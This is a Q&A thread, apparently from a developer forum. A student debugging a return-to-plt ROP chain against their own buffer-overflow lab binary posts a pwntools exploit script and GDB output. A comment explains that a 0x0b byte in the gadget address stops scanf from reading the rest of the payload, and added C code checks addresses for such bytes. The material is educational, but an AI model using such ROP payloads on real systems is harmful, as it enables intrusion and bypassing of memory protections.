
I am trying to bypass ASLR using the return-to-plt attack. For this I have to use a `pop rdi; ret` gadget. I was able to find this gadget in __libc_csu_init, but for some reason whenever I use this address it gets corrupted on the stack. I can use __libc_csu_init + 88; anything greater than this gets corrupted, and the `pop rdi; ret` is at __libc_csu_init + 91. What is happening? Is there a new kind of mitigation technique which is preventing rip from pointing to the gadget address?

My GCC version is 11.3.0. Here is the C code:

```c
#include<stdio.h>
#include<unistd.h>

void getmessage(void)
{
    char msg[200];
    printf("Enter the message: ");
    scanf("%s", msg);
    printf("Message received.\n");
}
void main(void)
{
    getmessage();
}
```

Here is my Exploit Script:

```python
from pwn import *

puts_plt = 0x0401030
puts_got = 0x404018
start = 0x401060
bin = context.binary = ELF('vul')
pop_r14 = bin.symbols.__libc_csu_init + 91 #address of pop rdi; gadget.. 0x40120b
ret = bin.symbols._init + 22
context.os = "linux"
context.arch = "amd64"
payload = b'A' * 216
payload += p64(ret)
payload += p64(pop_r14)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
f = open("file", "wb")
f.write(payload)
f.close()  # flush the payload to disk before it is fed to the binary
# vul = process("./vul")
# vul.sendline(payload)
# print(vul.recvline())
# print(vul.recvline())
```

The output of the GDB PEDA plugin:

```
[----------------------------------registers-----------------------------------]
RAX: 0x12
RBX: 0x4011b0 (<__libc_csu_init>:       push   r15)
RCX: 0x7ffff7ec5603 (<__GI___libc_write+19>:    cmp    rax,0xfffffffffffff000)
RDX: 0x0
RSI: 0x4052a0 ("Enter the message: Message received.\n")
RDI: 0x7ffff7fa8670 --> 0x0
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffda18 --> 0x401016 (<_init+22>:   ret)
RIP: 0x401194 (<getmessage+78>: ret)
R8 : 0x12
R9 : 0xffffffffffffff88
R10: 0x400460 --> 0x6972700073747570 ('puts')
R11: 0x246
R12: 0x401060 (<_start>:        xor    ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40118d <getmessage+71>:    call   0x401030 <puts@plt>
   0x401192 <getmessage+76>:    nop
   0x401193 <getmessage+77>:    leave
=> 0x401194 <getmessage+78>:    ret
   0x401195 <main>:     push   rbp
   0x401196 <main+1>:   mov    rbp,rsp
   0x401199 <main+4>:   call   0x401146 <getmessage>
   0x40119e <main+9>:   nop
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffda18 --> 0x401016 (<_init+22>:  ret)
0008| 0x7fffffffda20 --> 0x0
0016| 0x7fffffffda28 --> 0x7ffff7dfe7fd (<__libc_start_main+205>:       mov    edi,eax)
0024| 0x7fffffffda30 --> 0x7fffffffdb18 --> 0x7fffffffdd89 ("/mnt/c/Users/arsla/Desktop/University_Work/FYP_START/bufferoverflow/aslr_bypass/vul")
0032| 0x7fffffffda38 --> 0x1f7fcb000
0040| 0x7fffffffda40 --> 0x401195 (<main>:      push   rbp)
0048| 0x7fffffffda48 --> 0x7fffffffdd69 --> 0x515ef41e25354fba
0056| 0x7fffffffda50 --> 0x4011b0 (<__libc_csu_init>:   push   r15)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000401194      10      }
gdb-peda$
```
  • So, I was able to solve this issue. I noticed the address of the gadget was `0x40120b`; the problem is that `0b` is the ASCII for the vertical tab, so scanf was not taking the input properly. – DeathNet123 Jul 05 '22 at 13:50
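The comment above names the root cause: a `%s` conversion skips leading white space and then stores bytes only up to the next white-space byte, and 0x0b, the low byte of the little-endian encoding of 0x40120b, is `'\v'`. The C program below is an added example written for this page, not code from the question or from pwntools. It models the `%s` conversion as the C standard describes it (using `isspace()` in the "C" locale), rebuilds a payload with the same layout and constants as the script in the question, reports how many bytes would actually be stored into `msg`, and provides a check for whether an 8-byte little-endian address contains any byte that terminates a `%s` read. Note that 0x00 is not white space, so the high NUL bytes of these addresses are not the problem; only the 0x0b byte is.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of scanf("%s", buf) applied to a raw byte stream, following
 * C11 7.21.6.2: skip leading white-space bytes, then store bytes up to
 * (but not including) the next white-space byte. In the "C" locale
 * isspace() is true for exactly ' ' 0x20, '\t' 0x09, '\n' 0x0a,
 * '\v' 0x0b, '\f' 0x0c and '\r' 0x0d.
 * Returns the number of bytes the real conversion would write; the copy
 * into out is bounded by outsz so this model itself cannot overflow
 * (the real %s without a width has no such bound, which is the
 * vulnerability in the question's target). out may be NULL to only count. */
size_t scanf_s_model(const unsigned char *in, size_t len,
                     unsigned char *out, size_t outsz)
{
    size_t i = 0, n = 0;
    while (i < len && isspace(in[i]))          /* leading white space is skipped */
        i++;
    while (i < len && !isspace(in[i])) {       /* copy until the next white space */
        if (out != NULL && n < outsz)
            out[n] = in[i];
        n++;
        i++;
    }
    return n;
}

/* Little-endian encoding of a 64-bit value, as pwntools p64() produces it. */
static void put_le64(unsigned char *dst, uint64_t v)
{
    for (int k = 0; k < 8; k++)
        dst[k] = (unsigned char)(v >> (8 * k));
}

/* 1 if none of the 8 little-endian bytes of addr would terminate a %s read. */
int address_safe_for_scanf_s(uint64_t addr)
{
    unsigned char b[8];
    put_le64(b, addr);
    for (int k = 0; k < 8; k++)
        if (isspace(b[k]))
            return 0;
    return 1;
}

/* Rebuild the payload from the question (constructed here from the
 * constants the script uses: 216 filler bytes, then _init+22, the
 * __libc_csu_init+91 gadget, puts@got, puts@plt and _start) and return
 * how many of its bytes a %s read would store. Everything from the
 * 0x0b byte onward never reaches the stack, so the slots past the
 * filler and the first return address keep whatever was there before. */
size_t stored_payload_prefix(void)
{
    static const uint64_t chain[] = { 0x401016, 0x40120b, 0x404018, 0x401030, 0x401060 };
    unsigned char payload[216 + 8 * 5];
    memset(payload, 'A', 216);
    for (size_t k = 0; k < 5; k++)
        put_le64(payload + 216 + 8 * k, chain[k]);
    return scanf_s_model(payload, sizeof payload, NULL, 0);
}

/* How many of the 256 byte values terminate a %s conversion. */
int count_terminator_bytes(void)
{
    int c = 0;
    for (int b = 0; b < 256; b++)
        if (isspace(b))
            c++;
    return c;
}

int main(void)
{
    printf("bytes that terminate %%s: %d\n", count_terminator_bytes());
    printf("payload bytes stored by %%s: %zu of %d\n",
           stored_payload_prefix(), 216 + 8 * 5);
    printf("0x401208 safe: %d, 0x40120b safe: %d\n",
           address_safe_for_scanf_s(0x401208), address_safe_for_scanf_s(0x40120b));
    return 0;
}
```

Running it shows the payload is cut at 224 bytes, i.e. after the filler and the first return address, which matches the observation that __libc_csu_init + 88 (0x401208, no white-space byte) is usable while 0x40120b is not. The same check applied to any address before it is placed in a chain read through `scanf("%s")` (or through any other whitespace-delimited reader) tells you in advance which ones cannot be delivered intact.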
